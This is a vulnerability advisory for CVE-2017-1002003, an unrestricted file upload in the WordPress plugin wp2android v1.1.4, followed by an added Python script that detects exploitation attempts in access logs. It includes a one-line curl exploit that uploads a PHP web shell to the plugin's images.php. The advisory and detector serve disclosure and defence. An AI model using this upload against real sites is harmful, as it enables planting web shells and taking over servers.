The VapidLabs Vulnerability Database

Vulnerabilities Discovered by Larry W. Cashdollar

Unrestricted File Upload vulnerability in WordPress Plugin wp2android-turn-wp-site-into-android-app v1.1.4

ID: 930 | Date: 2017-03-01
CVE ID(s): CVE-2017-1002003
Summary: The plugin includes unlicensed vulnerable CMS software from http://www.invedion.com.
Type: File upload vulnerability
Notified: 2017-03-01
Description:
“Mobile App Plugin iPhone & Android Make your WordPress website to a Mobile app & mobile website”
Exploit:
$ curl -F "file=@/var/www/shell.php" "http://example.com/wordpress/wp-content/plugins/wp2android-turn-wp-site-into-android-app/server/images.php"
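
Detection: the command above sends a multipart POST to the plugin's server/images.php, so any POST to that path in a web server access log deserves review. The following is an added example, not part of the original advisory; it assumes the Apache/nginx "combined" log format, and the function names and sample log lines are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Plugin directory and upload endpoint from the advisory's curl command,
# relative to the WordPress root.
PLUGIN = "/wp-content/plugins/wp2android-turn-wp-site-into-android-app"
ENDPOINT = PLUGIN + "/server/images.php"

# Assumption: Apache/nginx "combined" access-log format.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')

def normalize(target):
    """Drop the query string, percent-decode, collapse '//' and '/./', lowercase."""
    path = unquote(target.split("?", 1)[0])
    return posixpath.normpath("/" + path.lstrip("/")).lower()

def find_upload_attempts(lines):
    """Return one record per POST that reaches the plugin's images.php."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # Suffix match: WordPress may be installed under any directory prefix.
        if normalize(m["target"]).endswith(ENDPOINT):
            status = int(m["status"])
            # 2xx means the script answered; review those hosts for new files first.
            hits.append({"ip": m["ip"], "time": m["ts"], "status": status,
                         "answered": 200 <= status < 300})
    return hits

# Constructed sample lines (documentation IP ranges), not from a real server.
SAMPLE_LOG = [
    f'203.0.113.7 - - [01/Mar/2017:10:00:01 +0000] "POST /wordpress{PLUGIN}/server/images.php HTTP/1.1" 200 31 "-" "curl/7.52.1"',
    f'203.0.113.7 - - [01/Mar/2017:10:00:05 +0000] "POST {PLUGIN}//server/images.php?x=1 HTTP/1.1" 404 162 "-" "curl/7.52.1"',
    f'198.51.100.4 - - [01/Mar/2017:10:01:00 +0000] "GET /wordpress{PLUGIN}/server/images.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [01/Mar/2017:10:02:00 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_upload_attempts(SAMPLE_LOG):
        print(hit)
```

A hit with a 2xx status only shows that the script responded; confirming whether a file was written requires inspecting the plugin directory on disk.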